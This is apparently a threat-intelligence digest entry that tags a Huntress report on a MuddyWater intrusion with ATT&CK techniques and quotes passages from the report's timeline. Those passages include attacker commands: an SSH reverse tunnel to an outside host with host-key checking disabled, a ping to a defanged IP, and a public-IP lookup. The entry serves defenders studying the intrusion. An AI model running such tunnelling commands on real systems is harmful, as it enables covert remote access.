TTPwire Vol. 1 · MITRE ATT&CK-tagged


Huntress

Unmasking an Attack Chain of MuddyWater

2026-03-06

ATT&CK techniques detected

5 predictions (ATT&CK technique, classifier confidence, and the passage of the original article that triggered the tag; indicators are defanged as in the source, and truncated passages are marked with …):

T1059.001 PowerShell (96%)
“…, more stable session. 2026-01-24 22:22:03 "c:\windows\system32\openssh\ssh.exe" -p 22 -o StrictHostKeyChecking=no [email protected][.]185 -2 -4 -N -R 10841 2026-01-24 22:25:48 "c:\windows\system32\windowspowershell\v1\po…”

T1059.001 PowerShell (81%)
“…-24 23:05:44 ping 157.20.182[.]49 2026-01-24 23:12:15 curl ifconfig[.]me 2026-01-24 23:21:31 fmapp.exe After a few seconds have passed, they open another PowerShell session: 2026-01-25 00:14:32 powershell The above timeline excerpt illustrat…”

T1071 Application Layer Protocol (57%)
“Unmasking an Attack Chain of MuddyWater. Acknowledgments: special thanks to Tyler Marzen and Anna Pham for their contributions to this investigation and write-up. TL;DR: Huntress has identified and detailed a full timeline of an intrusion in a customer environment that align…”
(The cited passage is the article's title, acknowledgments and TL;DR and contains no protocol evidence, so treat this tag as a low-confidence classifier hit rather than a finding from the report.)

T1021.001 Remote Desktop Protocol (43%) and T1572 Protocol Tunneling (36%), both tagged from the same passage:
“…activity. The initial access to the endpoint was achieved through a Terminal Services / RDP login. A timeline excerpt developed from detection data appears as follows: Figure 2: Timeline of activities. There are a few observations that we can make from some of the commands that w…”

Summary

Huntress has identified and detailed a full timeline of an intrusion in a customer environment that aligns with what others have identified as MuddyWater (Iranian-linked APT).